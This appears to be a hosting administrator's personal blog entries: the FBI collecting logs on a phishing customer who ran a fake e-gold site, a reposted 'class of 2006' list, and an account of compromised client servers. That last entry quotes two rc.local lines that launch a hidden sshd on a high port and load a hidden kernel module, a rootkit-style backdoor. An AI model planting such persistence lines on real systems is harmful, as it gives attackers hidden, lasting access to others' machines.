Today the FBI came by the office to pickup some logs on a scammer that was hosting with us, after taking his site down we kept all the info and logs on him .. I hope they catch the sucker.
Basically the user had a fake e-gold site, he would send emails out to people saying they need to verify their e-gold accounts, people then would go to HIS site and enter their details and pin numbers :p
ouch ..
Null
I read a good one today, so I tought I post it here
THE CLASS OF 2006
Just in case you weren’t feeling old enough today, this will
certainly change things. Each year the staff at Beloit College in
Wisconsin puts together a list to try to give the Faculty a sense of
the mindset of this year’s incoming freshman.
this morning while checking the helpdesk I got a suprise .. 3 different servers for the same client had apache down, a manual restart would not bring it back to live, and worst .. no errors on the log.
upon further investigation I found this on rc.local
/etc/rc.d/init.d/.incsshd -p 31221
/sbin/insmod /etc/.incrl.o
unfortunately on of my techs also found it and deleted it .. seems the system was compromised .. but the other two .. no indication of any breaches.
the kernels are 2.4.18’s .. so I know they have the ptrace exploit .. time to do some recompiling
Null